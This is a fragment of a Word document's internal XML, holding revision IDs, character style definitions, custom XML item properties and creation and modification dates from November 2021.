    <w:p w14:paraId="2E24AAFB" w14:textId="77777777" w:rsidR="00B852F4" w:rsidRDefault="00B852F4" w:rsidP="00D3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0459"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F8CE8C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zNDIxszSwMDW2MDJS0lEKTi0uzszPAykwrQUAZcEKkiwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00E87C6C"/>
    <w:rsid w:val="00026209"/>
    <w:rsid w:val="000863FC"/>
    <w:rsid w:val="001A4101"/>
    <w:rsid w:val="001B5DEC"/>
    <w:rsid w:val="002869DB"/>
    <w:rsid w:val="002C4D1A"/>
    <w:rsid w:val="003002CB"/>
    <w:rsid w:val="0034148B"/>
    <w:rsid w:val="003C1BA6"/>
    <w:rsid w:val="003E2088"/>
    <w:rsid w:val="004D17F7"/>
    <w:rsid w:val="00563C1D"/>
    <w:rsid w:val="006027F4"/>
    <w:rsid w:val="00623F01"/>
    <w:rsid w:val="00662484"/>
    <w:rsid w:val="00702F12"/>
    <w:rsid w:val="0072006F"/>
    <w:rsid w:val="00763484"/>
    <w:rsid w:val="007D1394"/>
    <w:rsid w:val="0086082C"/>
    <w:rsid w:val="00864810"/>
    <w:rsid w:val="0094082D"/>
    <w:rsid w:val="009650F8"/>
    <w:rsid w:val="00994117"/>
    <w:rsid w:val="009E6459"/>
    <w:rsid w:val="00A66F1D"/>
    <w:rsid w:val="00B00B85"/>
    <w:rsid w:val="00B16653"/>
    <w:rsid w:val="00B75233"/>
    <w:rsid w:val="00B852F4"/>
    <w:rsid w:val="00C020C6"/>
    <w:rsid w:val="00C42749"/>
    <w:rsid w:val="00C87783"/>
    <w:rsid w:val="00CB6EFC"/>
    <w:rsid w:val="00CC31D3"/>
    <w:rsid w:val="00CC54D7"/>
    <w:rsid w:val="00D3285B"/>
    <w:rsid w:val="00DE09E0"/>
    <w:rsid w:val="00E26B56"/>
    <w:rsid w:val="00E87C6C"/>
    <w:rsid w:val="00E95B87"/>
    <w:rsid w:val="00EA7C74"/>
    <w:rsid w:val="00ED4E7B"/>
    <w:rsid w:val="00EE6990"/>
    <w:rsid w:val="00F606B2"/>
    <w:rsid w:val="00FB585D"/>
    <w:rsid w:val="00FB594E"/>
    <w:rsid w:val="00FD3983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B9A9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7F4F3B0A-72BD-4BC0-9DBA-7B10255E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87C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6C"/>
    <w:rPr>
      <w:rFonts w:eastAsia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E87C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9E0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Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00DE09E0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CB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EF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5B"/>
    <w:rPr>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2phjq">
    <w:name w:val="_2phjq"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00EA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customXml" Target="../customXml/item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30844-5A56-430B-81FE-392FDA5F848F}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CA3ECCA0-871A-4761-B8B9-49D8594B02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dcterms:created xsi:type="dcterms:W3CDTF">2021-11-15T12:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-15T12:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>